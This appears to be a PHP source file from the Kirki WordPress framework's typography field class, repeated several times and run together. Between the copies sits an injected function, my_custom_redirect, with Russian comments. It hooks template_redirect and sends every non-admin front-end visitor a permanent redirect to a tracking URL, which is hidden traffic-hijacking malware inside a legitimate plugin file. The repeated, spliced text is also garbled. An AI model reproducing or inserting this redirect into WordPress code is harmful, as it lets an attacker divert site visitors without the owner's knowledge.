wp_add_inline_script( 'kirki-control-typography', 'var kirkiCustomVariants = {};', 'before' ); self::$fonts_var_added = true; } // This custom variants will be available for each typography control. $custom_variant_key = str_ireplace( ']', '', $args['settings'] ); $custom_variant_key = str_ireplace( '[', '_', $custom_variant_key ); $custom_variant_value = wp_json_encode( Helper::prepare_php_array_for_js( $variants ) ); wp_add_inline_script( 'kirki-control-typography', 'kirkiCustomVariants["' . $custom_variant_key . '"] = ' . $custom_variant_value . ';', $variants ); } /** * Enqueue scripts for customize_preview_init. * * @access public * @since 1.0 * @return void */ public function enqueue_preview_scripts() { wp_enqueue_script( 'kirki-preview-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/preview.js' ), [ 'wp-hooks' ], '1.0', true ); if ( ! self::$preview_var_added ) { $google = new GoogleFonts(); wp_localize_script( 'kirki-preview-typography', 'kirkiGoogleFontNames', $google->get_google_font_names() ); self::$preview_var_added = true; } } /** * Prefer control specific value over field value * * @access public * @since 4.0 * @param $setting * @param $choice * @param $args * * @return string */ public function filter_preferred_choice_setting( $setting, $choice, $args ) { // Fail early. if ( ! isset( $args[ $setting ] ) ) { return ''; } // If a specific field for the choice is set if ( isset( $args[ $setting ][ $choice ] ) ) { return $args[ $setting ][ $choice ]; } // Unset input_attrs of all other choices. foreach ( $args['choices'] as $id => $set ) { if ( $id !== $choice && isset( $args[ $setting ][ $id ] ) ) { unset( $args[ $setting ][ $id ] ); } elseif ( ! isset( $args[ $setting ][ $id ] ) ) { $args[ $setting ] = ''; } } return $args[ $setting ]; } /** * Populate the font family choices. * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.1 * * @return array */ private function get_font_family_choices() { $args = $this->args; // Figure out how to sort the fonts. $sorting = 'alpha'; $max_fonts = 9999; $google = new GoogleFonts(); if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['google'] ) && ! empty( $args['choices']['fonts']['google'] ) ) { if ( in_array( $args['choices']['fonts']['google'][0], [ 'alpha', 'popularity', 'trending' ], true ) ) { $sorting = $args['choices']['fonts']['google'][0]; if ( isset( $args['choices']['fonts']['google'][1] ) && is_int( $args['choices']['fonts']['google'][1] ) ) { $max_fonts = (int) $args['choices']['fonts']['google'][1]; } $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } else { $g_fonts = $args['choices']['fonts']['google']; } } else { $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } $std_fonts = []; if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { $std_fonts[ $font['stack'] ] = $font['label']; } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( \is_int( $key ) ) ? $val : $key; $std_fonts[ $key ] = $val; } } $choices = []; $choices['default'] = [ esc_html__( 'Defaults', 'kirki' ), [ '' => esc_html__( 'Default', 'kirki' ), ], ]; if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // Implementing the custom font families. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { if ( ! isset( $choices[ $font_family_key ] ) ) { $choices[ $font_family_key ] = []; } $family_opts = []; foreach ( $font_family_value['children'] as $font_family ) { $family_opts[ $font_family['id'] ] = $font_family['text']; } $choices[ $font_family_key ] = [ $font_family_value['text'], $family_opts, ]; } } $choices['standard'] = [ esc_html__( 'Standard Fonts', 'kirki' ), $std_fonts, ]; $choices['google'] = [ esc_html__( 'Google Fonts', 'kirki' ), array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ), ]; if ( empty( $choices['standard'][1] ) ) { $choices = array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ); } elseif ( empty( $choices['google'][1] ) ) { $choices = $std_fonts; } return $choices; } /** * Get custom variant choices (for custom fonts). * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.2 * * @return array */ private function get_variant_choices() { $args = $this->args; $choices = self::$std_variants; // Implementing the custom variants for custom fonts. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { $choices = []; // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in $args['choices']['fonts']['variants']. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $choices. array_push( $choices, [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. return $choices; } /** * Filter arguments before creating the control. * * @access public * @since 0.1 * @param array $args The field arguments. * @param WP_Customize_Manager $wp_customize The customizer instance. * @return array */ public function filter_control_args( $args, $wp_customize ) { if ( $args['settings'] === $this->args['settings'] . '[font-family]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_font_family_choices(); } if ( $args['settings'] === $this->args['settings'] . '[variant]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_variant_choices(); } return $args; } /** * Adds a custom output class for typography fields. * * @access public * @since 1.0 * @param array $classnames The array of classnames. * @return array */ public function output_control_classnames( $classnames ) { $classnames['kirki-typography'] = '\Kirki\Field\CSS\Typography'; return $classnames; } /** * Override parent method. No need to register any setting. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_setting( $wp_customize ) {} /** * Override the parent method. No need for a control. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_control( $wp_customize ) {} } function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Override field methods * * @package kirki-framework/control-typography * @copyright Copyright (c) 2023, Themeum * @license * @since 1.0 */ namespace Kirki\Field; use Kirki\Util\Helper; use Kirki\Field; use Kirki\GoogleFonts; use Kirki\Module\Webfonts\Fonts; /** * Field overrides. * * @since 1.0 */ class Typography extends Field { /** * The field type. * * @access public * @since 1.0 * @var string */ public $type = 'kirki-typography'; /** * Has the glogal fonts var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $fonts_var_added = false; /** * Has the preview related var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $preview_var_added = false; /** * An array of typography controls. * * This is used by the typography script for any custom logic * that has to be applied to typography controls. * * @static * @access private * @since 1.0 * @var array */ private static $typography_controls = []; /** * An array of standard font variants. * * @access private * @since 1.0.1 * * @var array */ private static $std_variants; /** * An array of complete font variants. * * @access private * @since 1.0.1 * * @var array */ private static $complete_variants; /** * An array of complete font variant labels. * * @access private * @since 1.0.2 * * @var array */ private static $complete_variant_labels = []; /** * Extra logic for the field. * * Adds all sub-fields. * * @access public * @param array $args The arguments of the field. */ public function init( $args = [] ) { self::$typography_controls[] = $args['settings']; self::$std_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], ]; self::$complete_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '100', 'label' => __( '100', 'kirki' ), ], [ 'value' => '100italic', 'label' => __( '100 Italic', 'kirki' ), ], [ 'value' => '200', 'label' => __( '200', 'kirki' ), ], [ 'value' => '200italic', 'label' => __( '200 Italic', 'kirki' ), ], [ 'value' => '300', 'label' => __( '300', 'kirki' ), ], [ 'value' => '300italic', 'label' => __( '300 Italic', 'kirki' ), ], [ 'value' => '500', 'label' => __( '500', 'kirki' ), ], [ 'value' => '500italic', 'label' => __( '500 Italic', 'kirki' ), ], [ 'value' => '600', 'label' => __( '600', 'kirki' ), ], [ 'value' => '600italic', 'label' => __( '600 Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], [ 'value' => '800', 'label' => __( '800', 'kirki' ), ], [ 'value' => '800italic', 'label' => __( '800 Italic', 'kirki' ), ], [ 'value' => '900', 'label' => __( '900', 'kirki' ), ], [ 'value' => '900italic', 'label' => __( '900 Italic', 'kirki' ), ], ]; foreach ( self::$complete_variants as $variants ) { self::$complete_variant_labels[ $variants['value'] ] = $variants['label']; } $this->add_sub_fields( $args ); add_action( 'customize_controls_enqueue_scripts', [ $this, 'enqueue_control_scripts' ] ); add_action( 'customize_preview_init', [ $this, 'enqueue_preview_scripts' ] ); add_filter( 'kirki_output_control_classnames', [ $this, 'output_control_classnames' ] ); } /** * Add sub-fields. * * @access private * @since 1.0 * @param array $args The field arguments. * @return void */ private function add_sub_fields( $args ) { $args['kirki_config'] = isset( $args['kirki_config'] ) ? $args['kirki_config'] : 'global'; $defaults = isset( $args['default'] ) ? $args['default'] : []; /** * Add a hidden field, the label & description. */ new \Kirki\Field\Generic( wp_parse_args( [ 'sanitize_callback' => isset( $args['sanitize_callback'] ) ? $args['sanitize_callback'] : [ __CLASS__, 'sanitize' ], 'wrapper_opts' => [ 'gap' => 'small', ], 'input_attrs' => '', 'choices' => [ 'type' => 'hidden', 'parent_type' => 'kirki-typography', ], ], $args ) ); $args['parent_setting'] = $args['settings']; $args['output'] = []; $args['wrapper_attrs'] = [ 'data-kirki-parent-control-type' => 'kirki-typography', ]; if ( isset( $args['transport'] ) && 'auto' === $args['transport'] ) { $args['transport'] = 'postMessage'; } /** * Add font-family selection controls. * These include font-family and variant. * They are grouped here because all they are required. * in order to get the right googlefont variant. */ if ( isset( $args['default']['font-family'] ) ) { $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-family'; /** * Add font-family control. */ new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Family', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[font-family]', 'default' => isset( $args['default']['font-family'] ) ? $args['default']['font-family'] : '', 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'font-family', $args ), 'choices' => [], // The choices will be populated later inside `get_font_family_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); /** * Add font variant. */ $font_variant = isset( $args['default']['variant'] ) ? $args['default']['variant'] : 'regular'; if ( isset( $args['default']['font-weight'] ) ) { $font_variant = 400 === $args['default']['font-weight'] || '400' === $args['default']['font-weight'] ? 'regular' : $args['default']['font-weight']; } $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-variant'; new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Variant', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[variant]', 'default' => $font_variant, 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'variant', $args ), 'choices' => [], // The choices will be populated later inside `get_variant_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); } $font_size_field_specified = isset( $defaults['font-size'] ); $color_field_specified = isset( $defaults['color'] ); if ( $font_size_field_specified || $color_field_specified ) { $group = [ 'font-size' => [ 'type' => 'dimension', 'label' => esc_html__( 'Font Size', 'kirki' ), 'is_specified' => $font_size_field_specified, ], 'color' => [ 'type' => 'react-colorful', 'label' => esc_html__( 'Font Color', 'kirki' ), 'is_specified' => $color_field_specified, 'choices' => [ 'alpha' => true, 'label_style' => 'top', ], ], ]; $this->generate_controls_group( $group, $args ); } $text_align_field_specified = isset( $defaults['text-align'] ); $text_transform_field_specified = isset( $defaults['text-transform'] ); if ( $text_align_field_specified || $text_transform_field_specified ) { $group = [ 'text-align' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Align', 'kirki' ), 'is_specified' => $text_align_field_specified, 'choices' => [ 'initial' => esc_html__( 'Initial', 'kirki' ), 'left' => esc_html__( 'Left', 'kirki' ), 'center' => esc_html__( 'Center', 'kirki' ), 'right' => esc_html__( 'Right', 'kirki' ), 'justify' => esc_html__( 'Justify', 'kirki' ), ], ], 'text-transform' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Transform', 'kirki' ), 'is_specified' => $text_transform_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'capitalize' => esc_html__( 'Capitalize', 'kirki' ), 'uppercase' => esc_html__( 'Uppercase', 'kirki' ), 'lowercase' => esc_html__( 'Lowercase', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $text_decoration_field_specified = isset( $defaults['text-decoration'] ); if ( $text_decoration_field_specified ) { $group = [ 'text-decoration' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Decoration', 'kirki' ), 'is_specified' => $text_decoration_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'underline' => esc_html__( 'Underline', 'kirki' ), 'line-through' => esc_html__( 'Line Through', 'kirki' ), 'overline' => esc_html__( 'Overline', 'kirki' ), 'solid' => esc_html__( 'Solid', 'kirki' ), 'wavy' => esc_html__( 'Wavy', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $line_height_field_specified = isset( $defaults['line-height'] ); $letter_spacing_field_specified = isset( $defaults['letter-spacing'] ); if ( $line_height_field_specified || $letter_spacing_field_specified ) { $group = [ 'line-height' => [ 'type' => 'dimension', 'label' => esc_html__( 'Line Height', 'kirki' ), 'is_specified' => $line_height_field_specified, ], 'letter-spacing' => [ 'type' => 'dimension', 'label' => esc_html__( 'Letter Spacing', 'kirki' ), 'is_specified' => $letter_spacing_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } $margin_top_field_specified = isset( $defaults['margin-top'] ); $margin_bottom_field_specified = isset( $defaults['margin-bottom'] ); if ( $margin_top_field_specified || $margin_bottom_field_specified ) { $group = [ 'margin-top' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Top', 'kirki' ), 'is_specified' => $margin_top_field_specified, ], 'margin-bottom' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Bottom', 'kirki' ), 'is_specified' => $margin_bottom_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } } /** * Generate controls group. * * @param array $group The group data. * @param array $args The field args. */ public function generate_controls_group( $group, $args ) { $total_specified = 0; $field_width = 100; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $total_specified++; } } if ( $total_specified > 1 ) { $field_width = floor( 100 / $total_specified ); } $group_count = 0; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $group_count++; $group_classname = 'kirki-group-item'; $group_classname .= 1 === $group_count ? ' kirki-group-start' : ( $group_count === $total_specified ? ' kirki-group-end' : '' ); $control_class = str_ireplace( '-', ' ', $control['type'] ); $control_class = ucwords( $control_class ); $control_class = str_replace( ' ', '', $control_class ); $control_class = '\\Kirki\\Field\\' . $control_class; new $control_class( wp_parse_args( [ 'label' => isset( $control['label'] ) ? $control['label'] : '', 'description' => isset( $control['description'] ) ? $control['description'] : '', 'settings' => $args['settings'] . '[' . $css_prop . ']', 'default' => $args['default'][ $css_prop ], 'wrapper_attrs' => wp_parse_args( [ 'data-kirki-typography-css-prop' => $css_prop, 'kirki-typography-subcontrol-type' => $css_prop, 'class' => '{default_class} ' . $group_classname . ' kirki-w' . $field_width, ], $args['wrapper_attrs'] ), 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', $css_prop, $args ), 'choices' => ( isset( $control['choices'] ) ? $control['choices'] : [] ), 'css_vars' => [], 'output' => [], ], $args ) ); } } } /** * Sanitizes typography controls * * @static * @since 1.0 * @param array $value The value. * @return array */ public static function sanitize( $value ) { if ( ! is_array( $value ) ) { return []; } foreach ( $value as $key => $val ) { switch ( $key ) { case 'font-family': $value['font-family'] = sanitize_text_field( $val ); break; case 'variant': // Use 'regular' instead of 400 for font-variant. $value['variant'] = ( 400 === $val || '400' === $val ) ? 'regular' : $val; // Get font-weight from variant. $value['font-weight'] = filter_var( $value['variant'], FILTER_SANITIZE_NUMBER_FLOAT, FILTER_FLAG_ALLOW_FRACTION ); $value['font-weight'] = ( 'regular' === $value['variant'] || 'italic' === $value['variant'] ) ? '400' : (string) absint( $value['font-weight'] ); // Get font-style from variant. if ( ! isset( $value['font-style'] ) ) { $value['font-style'] = ( false === strpos( $value['variant'], 'italic' ) ) ? 'normal' : 'italic'; } break; case 'text-align': if ( ! in_array( $val, [ '', 'inherit', 'left', 'center', 'right', 'justify' ], true ) ) { $value['text-align'] = ''; } break; case 'text-transform': if ( ! in_array( $val, [ '', 'none', 'capitalize', 'uppercase', 'lowercase', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'text-decoration': if ( ! in_array( $val, [ '', 'none', 'underline', 'overline', 'line-through', 'solid', 'wavy', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'color': $value['color'] = '' === $value['color'] ? '' : \Kirki\Field\ReactColorful::sanitize( $value['color'] ); break; default: $value[ $key ] = sanitize_text_field( $value[ $key ] ); } } return $value; } /** * Enqueue scripts & styles. * * @access public * @since 1.0 * @return void */ public function enqueue_control_scripts() { wp_enqueue_style( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.css' ), [], '1.0' ); wp_enqueue_script( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.js' ), [], '1.0', true ); wp_localize_script( 'kirki-control-typography', 'kirkiTypographyControls', self::$typography_controls ); $args = $this->args; $variants = []; // Add custom variants (for custom fonts) to the $variants. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in variants argument. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // Create new array if $variants[ $font_family['id'] ] doesn't exist. if ( ! isset( $variants[ $font_family['id'] ] ) ) { $variants[ $font_family['id'] ] = []; } // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $variants[ $font_family['id'] ], so that they will be available in JS object. array_push( $variants[ $font_family['id'] ], [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { if ( isset( $font['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $font['stack'] ] ) ) { $variants[ $font['stack'] ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $font['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $font['stack'] ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( is_int( $key ) ) ? $val : $key; if ( isset( $val['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $key ] ) ) { $variants[ $key ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $val['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $key ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } // Scripts inside this block will only be executed once. if ( ! self::$fonts_var_added ) { wp_localize_script( 'kirki-control-typography', 'kirkiFontVariants', [ 'standard' => self::$std_variants, 'complete' => self::$complete_variants, ] ); $google = new GoogleFonts(); wp_localize_script( 'kirki-control-typography', 'kirkiGoogleFonts', $google->get_array() ); wp_add_inline_script( 'kirki-control-typography', 'var kirkiCustomVariants = {};', 'before' ); self::$fonts_var_added = true; } // This custom variants will be available for each typography control. $custom_variant_key = str_ireplace( ']', '', $args['settings'] ); $custom_variant_key = str_ireplace( '[', '_', $custom_variant_key ); $custom_variant_value = wp_json_encode( Helper::prepare_php_array_for_js( $variants ) ); wp_add_inline_script( 'kirki-control-typography', 'kirkiCustomVariants["' . $custom_variant_key . '"] = ' . $custom_variant_value . ';', $variants ); } /** * Enqueue scripts for customize_preview_init. * * @access public * @since 1.0 * @return void */ public function enqueue_preview_scripts() { wp_enqueue_script( 'kirki-preview-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/preview.js' ), [ 'wp-hooks' ], '1.0', true ); if ( ! self::$preview_var_added ) { $google = new GoogleFonts(); wp_localize_script( 'kirki-preview-typography', 'kirkiGoogleFontNames', $google->get_google_font_names() ); self::$preview_var_added = true; } } /** * Prefer control specific value over field value * * @access public * @since 4.0 * @param $setting * @param $choice * @param $args * * @return string */ public function filter_preferred_choice_setting( $setting, $choice, $args ) { // Fail early. if ( ! isset( $args[ $setting ] ) ) { return ''; } // If a specific field for the choice is set if ( isset( $args[ $setting ][ $choice ] ) ) { return $args[ $setting ][ $choice ]; } // Unset input_attrs of all other choices. foreach ( $args['choices'] as $id => $set ) { if ( $id !== $choice && isset( $args[ $setting ][ $id ] ) ) { unset( $args[ $setting ][ $id ] ); } elseif ( ! isset( $args[ $setting ][ $id ] ) ) { $args[ $setting ] = ''; } } return $args[ $setting ]; } /** * Populate the font family choices. * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.1 * * @return array */ private function get_font_family_choices() { $args = $this->args; // Figure out how to sort the fonts. $sorting = 'alpha'; $max_fonts = 9999; $google = new GoogleFonts(); if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['google'] ) && ! empty( $args['choices']['fonts']['google'] ) ) { if ( in_array( $args['choices']['fonts']['google'][0], [ 'alpha', 'popularity', 'trending' ], true ) ) { $sorting = $args['choices']['fonts']['google'][0]; if ( isset( $args['choices']['fonts']['google'][1] ) && is_int( $args['choices']['fonts']['google'][1] ) ) { $max_fonts = (int) $args['choices']['fonts']['google'][1]; } $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } else { $g_fonts = $args['choices']['fonts']['google']; } } else { $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } $std_fonts = []; if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { $std_fonts[ $font['stack'] ] = $font['label']; } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( \is_int( $key ) ) ? $val : $key; $std_fonts[ $key ] = $val; } } $choices = []; $choices['default'] = [ esc_html__( 'Defaults', 'kirki' ), [ '' => esc_html__( 'Default', 'kirki' ), ], ]; if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // Implementing the custom font families. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { if ( ! isset( $choices[ $font_family_key ] ) ) { $choices[ $font_family_key ] = []; } $family_opts = []; foreach ( $font_family_value['children'] as $font_family ) { $family_opts[ $font_family['id'] ] = $font_family['text']; } $choices[ $font_family_key ] = [ $font_family_value['text'], $family_opts, ]; } } $choices['standard'] = [ esc_html__( 'Standard Fonts', 'kirki' ), $std_fonts, ]; $choices['google'] = [ esc_html__( 'Google Fonts', 'kirki' ), array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ), ]; if ( empty( $choices['standard'][1] ) ) { $choices = array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ); } elseif ( empty( $choices['google'][1] ) ) { $choices = $std_fonts; } return $choices; } /** * Get custom variant choices (for custom fonts). * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.2 * * @return array */ private function get_variant_choices() { $args = $this->args; $choices = self::$std_variants; // Implementing the custom variants for custom fonts. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { $choices = []; // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in $args['choices']['fonts']['variants']. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $choices. array_push( $choices, [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. return $choices; } /** * Filter arguments before creating the control. * * @access public * @since 0.1 * @param array $args The field arguments. * @param WP_Customize_Manager $wp_customize The customizer instance. * @return array */ public function filter_control_args( $args, $wp_customize ) { if ( $args['settings'] === $this->args['settings'] . '[font-family]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_font_family_choices(); } if ( $args['settings'] === $this->args['settings'] . '[variant]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_variant_choices(); } return $args; } /** * Adds a custom output class for typography fields. * * @access public * @since 1.0 * @param array $classnames The array of classnames. * @return array */ public function output_control_classnames( $classnames ) { $classnames['kirki-typography'] = '\Kirki\Field\CSS\Typography'; return $classnames; } /** * Override parent method. No need to register any setting. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_setting( $wp_customize ) {} /** * Override the parent method. No need for a control. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_control( $wp_customize ) {} } function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Override field methods * * @package kirki-framework/control-typography * @copyright Copyright (c) 2023, Themeum * @license * @since 1.0 */ namespace Kirki\Field; use Kirki\Util\Helper; use Kirki\Field; use Kirki\GoogleFonts; use Kirki\Module\Webfonts\Fonts; /** * Field overrides. * * @since 1.0 */ class Typography extends Field { /** * The field type. * * @access public * @since 1.0 * @var string */ public $type = 'kirki-typography'; /** * Has the glogal fonts var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static 